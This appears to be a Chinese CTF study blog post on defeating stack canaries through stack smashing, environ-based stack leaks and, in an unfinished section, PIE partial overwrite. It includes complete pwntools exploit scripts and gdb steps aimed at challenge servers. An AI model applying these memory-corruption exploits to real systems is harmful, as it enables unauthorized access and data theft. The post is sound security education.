<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="wutong">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    
    
    <!--- Seo Part-->
    
    <link rel="canonical" href="https://wutong01304.github.io/2023/07/19/tricks/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="Canary是一种用于检测缓冲区溢出和内存错误的特殊字符。Canary的值通常是一个非常特殊的值，它在内存中很难被覆盖或修改。在程序运行时，Canary会存储在特定的内存位置上，当程序尝试访问或写入该内存位置时，Canary的值将被更改。如果Canary的值在程序执行期间被更改，那么就存在缓冲区溢出或内存错误。但是有一些可以绕过它的方法。 一、Stack smash1.1 介绍在程序加了 cana">
<meta property="og:type" content="article">
<meta property="og:title" content="花式栈溢出技巧">
<meta property="og:url" content="https://wutong01304.github.io/2023/07/19/tricks/index.html">
<meta property="og:site_name" content="wutong">
<meta property="og:description" content="Canary是一种用于检测缓冲区溢出和内存错误的特殊字符。Canary的值通常是一个非常特殊的值，它在内存中很难被覆盖或修改。在程序运行时，Canary会存储在特定的内存位置上，当程序尝试访问或写入该内存位置时，Canary的值将被更改。如果Canary的值在程序执行期间被更改，那么就存在缓冲区溢出或内存错误。但是有一些可以绕过它的方法。 一、Stack smash1.1 介绍在程序加了 cana">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar1.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar2.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar3.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar4.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar5.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar6.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar7.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar8.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar9.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar10.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/gu1.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/gu3.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/gu2.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/gu5.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/gu4.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/gu6.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/gu7.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/gu8.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/p1.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/p2.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/b1.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/p3.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/p4.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/p5.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/c1.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/c2.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/c3.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/c5.jpg?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/c4.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/c6.jpg?x-oss-process=style/watermark">
<meta property="article:published_time" content="2023-07-19T02:45:50.000Z">
<meta property="article:modified_time" content="2023-07-30T13:24:04.936Z">
<meta property="article:author" content="wutong">
<meta property="article:tag" content="Pwn">
<meta property="article:tag" content="Stack">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar1.png?x-oss-process=style/watermark">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/my-logo-favicon.jpg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/my-logo-favicon.jpg">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/my-logo-favicon.jpg">
    <!--- Page Info-->
    
    <title>
        
            花式栈溢出技巧 -
        
        wutong
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
<link rel="stylesheet" href="/fonts/fonts.css">

    
<link rel="stylesheet" href="/fonts/Satoshi/satoshi.css">

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">

    <!--- Font Part-->
    
    
    
    

    <!--- Inject Part-->
    
    <script id="hexo-configurations">
    let Global = window.Global || {};
    Global.hexo_config = {"hostname":"wutong01304.github.io","root":"/","language":"en"};
    Global.theme_config = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true},"word_count":{"enable":false,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":2,"number":false,"expand":true,"init_open":true},"copyright":true,"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"busuanzi_counter":{"enable":false,"site_pv":false,"site_uv":false,"post_pv":false},"pjax":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"static","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"梧桐","subtitle":{"text":["梧桐生矣，于彼朝阳"],"hitokoto":{"enable":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":false,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.2.1","navbar":{"auto_hide":false,"tags":{"Tags":{"icon":"fa-solid fa-tags","path":"/tags/"}},"categories":{"Categories":{"icon":"fa-solid fa-folder","path":"/categories/"}},"color":{"left":"#f78736","right":"#367df7","transparency":35},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Github":{"path":"https://github.com/wutong01304","icon":"github"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"cloud"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"links":null},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2023/7/1 11:45:14"};
    Global.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    Global.data_config = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <span class="pjax-progress-icon">
            <i class="fa-solid fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container">

    

    <div class="main-content-container">

        <div class="main-content-header">
            <header class="navbar-container">
    
    <div class="navbar-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                wutong
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/"  >
                                    
                                        
                                            <i class="fa-regular fa-house"></i>
                                        
                                        HOME
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    target="_blank" rel="noopener" href="https://github.com/wutong01304"  >
                                    
                                        
                                            <i class="github"></i>
                                        
                                        GITHUB
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile drawer -->
    <div class="navbar-drawer">
        <ul class="drawer-navbar-list">
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        href="/"  >
                             
                                
                                    <i class="fa-regular fa-house"></i>
                                
                                HOME
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        target="_blank" rel="noopener" href="https://github.com/wutong01304"  >
                             
                                
                                    <i class="github"></i>
                                
                                GITHUB
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            

        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="post-page-container">
        <div class="article-content-container">

            
             
                <div class="article-title">         
                    <img src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/trickscover.jpg" alt="花式栈溢出技巧" />
                    <h1 class="article-title-cover">花式栈溢出技巧</h1>
                </div>
            
                
            

            
                <div class="article-header">
                    <div class="avatar">
                        <img src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/my-logo-avatar.jpg">
                    </div>
                    <div class="info">
                        <div class="author">
                            <span class="name">wutong</span>
                            
                                <span class="author-label">Lv2</span>
                            
                        </div>
                        <div class="meta-info">
                            <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2023-07-19 10:45:50</span>
        <span class="mobile">2023-07-19 10:45</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2023-07-30 21:24:04</span>
            <span class="mobile">2023-07-30 21:24</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/categories/Study/">Study</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/Pwn/">Pwn</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/Stack/">Stack</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content markdown-body">
                <p>Canary是一种用于检测缓冲区溢出和内存错误的特殊字符。Canary的值通常是一个非常特殊的值，它在内存中很难被覆盖或修改。在程序运行时，Canary会存储在特定的内存位置上，当程序尝试访问或写入该内存位置时，Canary的值将被更改。如果Canary的值在程序执行期间被更改，那么就存在缓冲区溢出或内存错误。但是有一些可以绕过它的方法。</p>
<h1 id="一、Stack-smash"><a href="#一、Stack-smash" class="headerlink" title="一、Stack smash"></a>一、Stack smash</h1><h2 id="1-1-介绍"><a href="#1-1-介绍" class="headerlink" title="1.1 介绍"></a>1.1 介绍</h2><p>在程序加了 canary 保护之后，如果我们输入的内容覆盖掉 canary 的话就会报错，程序就会执行 stack_chk_fail 函数来打印 argv[0] 指针所指向的字符串，正常情况下，这个指针指向了程序名，但是如果我们能够利用栈溢出控制这个东西，那我们就可以让 stack_chk_fail 打印出我们想要的东西。stack_chk_fail函数如下：</p>
<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> __attribute__ ((<span class="keyword">noreturn</span>)) __stack_chk_fail (<span class="type">void</span>)</span><br><span class="line">&#123;</span><br><span class="line">  __fortify_fail (<span class="string">&quot;stack smashing detected&quot;</span>); </span><br><span class="line">&#125;</span><br><span class="line"><span class="type">void</span> __attribute__ ((<span class="keyword">noreturn</span>)) internal_function __fortify_fail (<span class="type">const</span> <span class="type">char</span> *msg)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="comment">/* The loop is added only to keep gcc happy.  */</span></span><br><span class="line">  <span class="keyword">while</span> (<span class="number">1</span>)</span><br><span class="line">    __libc_message (<span class="number">2</span>, <span class="string">&quot;*** %s ***: %s terminated\n&quot;</span>,</span><br><span class="line">                    msg, __libc_argv[<span class="number">0</span>] ?: <span class="string">&quot;&lt;unknown&gt;&quot;</span>); <span class="comment">//打印argv[0]的内容</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>执行后如下：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar1.png?x-oss-process=style/watermark"
                     
                ></p>
<p>程序名为&#x2F;home&#x2F;ctf&#x2F;smashes。如果我们利用栈溢出覆盖 argv[0] 为我们想要输出的字符串的地址，那么在 __fortify_fail 函数中就会输出我们想要的信息。</p>
<h2 id="1-2-例题"><a href="#1-2-例题" class="headerlink" title="1.2 例题"></a>1.2 例题</h2><p>题目链接：<a class="link"   target="_blank" rel="noopener" href="https://www.jarvisoj.com/" >https://www.jarvisoj.com/ <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a> 。题目名字：Smashes ，题目链接  pwn.jarvisoj.com 9877，直接nc就可以连。</p>
<p>反汇编</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar2.png?x-oss-process=style/watermark"
                     
                ></p>
<p>存在Canary保护，且在 _IO_getc(&amp;v4) 处存在栈溢出。程序可以输入两次内容。v4我们可以直接看到有<strong>0x128</strong>位。第一次输入姓名，在第二次输入以后，程序会将原本flag所在的地方byte_600D20的地方改成v2：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar3.png?x-oss-process=style/watermark"
                     
                ></p>
<p>改变之后我们就无法得到flag了，因此我们需要在第一次溢出就打印出flag。</p>
<p>注意，下面有个 memset 指令，也就是说即便你不去第二遍输入程序自己也会给你设置成 0 。memset() 函数用来将指定内存的前n个字节设置为特定的值，其原型为：void * memset( void * ptr, int value, size_t num );  ptr 为要操作的内存的指针。value 为要设置的值。你既可以向 value 传递 int 类型的值，也可以传递 char 类型的值，int 和 char 可以根据 ASCII 码相互转换。num 为 ptr 的前 num 个字节，size_t 就是unsigned int。</p>
<p>溢出之后，程序会打印 argv[0] 指针所指向的字符串，也就是程序名：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar4.png?x-oss-process=style/watermark"
                     
                ></p>
<p>如果我们将argv[0]指向byte_600D20的地方，程序溢出时执行的 __stack_chk_fail 函数就会将flag打印出来。但是第2次输入时，会覆盖掉flag，即使不输入也有memset清除。但我们可以利用ELF 文件的映射，x86-64 程序的映射是从 0x400000 开始的，也就 flag 会在内存中出现两次，分别位于 0x00600d20 和 0x00400d20。这样的话即便被覆盖掉也没事，可以去0x00400d20找。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar5.png?x-oss-process=style/watermark"
                     
                ></p>
<p>查看汇编指令，看一下gets函数的参数：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar6.png?x-oss-process=style/watermark"
                     
                ></p>
<p>现在确定一下 argv[0] 在什么地方，可以直接用可以用 p &amp; __libc_argv[0] 找到这个 argv[0]：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar7.png?x-oss-process=style/watermark"
                     
                ></p>
<p>用这个地址减去rsp的地址</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar8.png?x-oss-process=style/watermark"
                     
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar9.png?x-oss-process=style/watermark"
                     
                ></p>
<p>也就是说，我们输入的内容要 <strong>0x218</strong> 以后才能把 argv[0] 给覆盖掉，那么写了 0x218 之后把 0x00400d20 写上就可以了。</p>
<p>必须设置如下环境变量：LIBC_FATAL_STDERR&#x3D;1，才能实现将标准错误信息通过管道输出到远程shell中。因此，我们还必须设置该参数。该参数的设置正好用到了我们的第2个输入字符串str，即将“LIBC_FATAL_STDERR_&#x3D;1”作为str输入进去，并将user字符串的溢出长度再增加16字节。</p>
<p>完整exp如下：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&#x27;pwn.jarvisoj.com&#x27;</span>,<span class="number">9877</span>)</span><br><span class="line">p.sendline(<span class="string">&quot;A&quot;</span>*<span class="number">0x218</span> + p64(<span class="number">0x400d20</span>) + p64(<span class="number">0</span>) + p64(<span class="number">0x600D20</span>))</span><br><span class="line">p.sendline(<span class="string">&quot;LIBC_FATAL_STDERR_=1&quot;</span>)</span><br><span class="line"><span class="built_in">print</span> p.recvall()</span><br></pre></td></tr></table></figure></div>

<p>成功得到flag:</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/ar10.png?x-oss-process=style/watermark"
                     
                ></p>
<h2 id="二、environ"><a href="#二、environ" class="headerlink" title="二、environ"></a>二、environ</h2><h2 id="2-1-介绍"><a href="#2-1-介绍" class="headerlink" title="2.1 介绍"></a>2.1 介绍</h2><p>在 Linux 系统中，glibc 的环境指针 environ(environment pointer) 为程序运行时所需要的环境变量表的起始地址，环境表中的指针指向各环境变量字符串。环境指针 environ 在栈空间的高地址处。因此，可通过 environ 指针泄露栈地址。在内存布局中，如果存储了flag，且environ和flag同属于一个段，那么即使开启ASLR之后，相对位置也不变，偏移量只和libc库有关。</p>
<ol>
<li>得到libc地址后，libc基址 + environ的偏移量 &#x3D; environ的地址</li>
<li>通过environ的地址得到environ的值，从而得到环境变量地址，环境变量保存在栈中，所以通过栈内的偏移量，可以访问栈中任意变量</li>
</ol>
<h2 id="2-2-例题"><a href="#2-2-例题" class="headerlink" title="2.2 例题"></a>2.2 例题</h2><p>题目：<a class="link"   target="_blank" rel="noopener" href="https://buuoj.cn/challenges#wdb2018_guess" >https://buuoj.cn/challenges#wdb2018_guess <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a> 。题目名字：wdb2018_guess</p>
<p>IDA反汇编：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/gu1.png?x-oss-process=style/watermark"
                     
                ></p>
<p>程序会先读取flag.txt文件中的内容，然后让用户猜测 flag。一共有三次机会：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/gu3.png?x-oss-process=style/watermark"
                     
                ></p>
<p>可以看到有 Canary 保护，以及 gets 函数溢出漏洞。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/gu2.png?x-oss-process=style/watermark"
                     
                ></p>
<p>查看 gets 函数，在0x400b23</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/gu5.png?x-oss-process=style/watermark"
                     
                ></p>
<p>使用objdump 命令查看汇编代码：gets 函数的参数在 rbp - 0x40 的地方:</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/gu4.png?x-oss-process=style/watermark"
                     
                ></p>
<p>用gdb对文件进行调试，在gets处下个断点。然后使用p &amp; __libc_argv[0] 找argv[0]的地址，然后计算argv[0]到ebp-0x40的偏移：<strong>0x128</strong></p>
<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">p &amp; __libc_argv[0] </span><br><span class="line">print $ebp-0x40</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/gu6.png?x-oss-process=style/watermark"
                     
                ></p>
<p>然后通过print打印environ的地址，通过find找到flag的位置，计算其偏移：<strong>0x168</strong></p>
<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">print environ</span><br><span class="line">find flag&#123;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/gu7.png?x-oss-process=style/watermark"
                     
                ></p>
<p>则falg的地址就是environ的真实地址减去0x168。</p>
<p>先通过第一次溢出，打印出put_addr的真实地址，利用其在libc里面的偏移计算environ的真实地址，然后通过第二次溢出，打印出environ指向的环境变量的地址，然后利用它与flag的偏移，计算出flag的地址，最后通过第三次溢出，打印flag。</p>
<p>完整exp：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span>*</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">25756</span>)</span><br><span class="line">puts_got = <span class="number">0x602020</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x128</span> + p64(puts_got) <span class="comment">#使argv[0]指向got地址，打印got真实地址</span></span><br><span class="line">p.sendlineafter(<span class="string">&quot;Please type your guessing flag\n&quot;</span>,payload)</span><br><span class="line">p.recvuntil(<span class="string">&quot;*** stack smashing detected ***: &quot;</span>)</span><br><span class="line">puts_addr = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\0&#x27;</span>))</span><br><span class="line">log.info(<span class="string">&quot;puts_addr:%#x&quot;</span>,puts_addr)</span><br><span class="line"></span><br><span class="line">libc=LibcSearcher(<span class="string">&#x27;puts&#x27;</span>,puts_addr)</span><br><span class="line">environ_addr = puts_addr - (libc.dump(<span class="string">&#x27;puts&#x27;</span>)-libc.dump(<span class="string">&#x27;environ&#x27;</span>))<span class="comment">#计算environ在libc的地址</span></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x128</span> + p64(environ_addr) <span class="comment">#使argv[0]指向environ地址,打印它在内存布局中的地址</span></span><br><span class="line">p.sendlineafter(<span class="string">&quot;Please type your guessing flag\n&quot;</span>,payload)</span><br><span class="line">p.recvuntil(<span class="string">&quot;*** stack smashing detected ***: &quot;</span>)</span><br><span class="line">environ = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\0&#x27;</span>))</span><br><span class="line">log.info(<span class="string">&quot;environ:%#x&quot;</span>,environ)</span><br><span class="line"></span><br><span class="line">flag_addr = environ - <span class="number">0x168</span></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">296</span> + p64(flag_addr)<span class="comment">##使argv[0]指向flag地址,打印flag</span></span><br><span class="line">p.sendlineafter(<span class="string">&quot;Please type your guessing flag\n&quot;</span>,payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>

<p>成功得到flag：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/gu8.png?x-oss-process=style/watermark"
                     
                ></p>
<hr>
<h1 id="三、partial-overwrite"><a href="#三、partial-overwrite" class="headerlink" title="三、partial overwrite"></a>三、partial overwrite</h1><h2 id="3-1-介绍"><a href="#3-1-介绍" class="headerlink" title="3.1 介绍"></a>3.1 介绍</h2><p>PIE（Position-Independent Executable）技术是一种将程序编译为位置无关代码的技术。它在编译程序时，生成与位置无关的代码，使得程序在加载时可以随机加载到内存中的任意位置。这样，即使攻击者能够控制程序的一部分内存，也无法确定程序在内存中的实际位置，从而增加了攻击的难度。</p>
<p>我们知道内存是以页载入机制，如果开启PIE保护的话，只能影响到单个内存页，一个内存页大小为0x1000，那么就意味着不管地址怎么变，某一条指令的后三位十六进制数的地址是始终不变的。因此我们可以通过覆盖地址的后几位来可以控制程序的流程</p>
<h2 id="3-2-例题"><a href="#3-2-例题" class="headerlink" title="3.2 例题"></a>3.2 例题</h2><p>题目链接：<a class="link"   target="_blank" rel="noopener" href="https://buuoj.cn/challenges#linkctf_2018.7_babypie" >https://buuoj.cn/challenges#linkctf_2018.7_babypie <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a> 。题目名字：linkctf_2018.7_babypie</p>
<p>反汇编：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/tricks/p1.png?x-oss-process=style/watermark"
                     
                ></p>
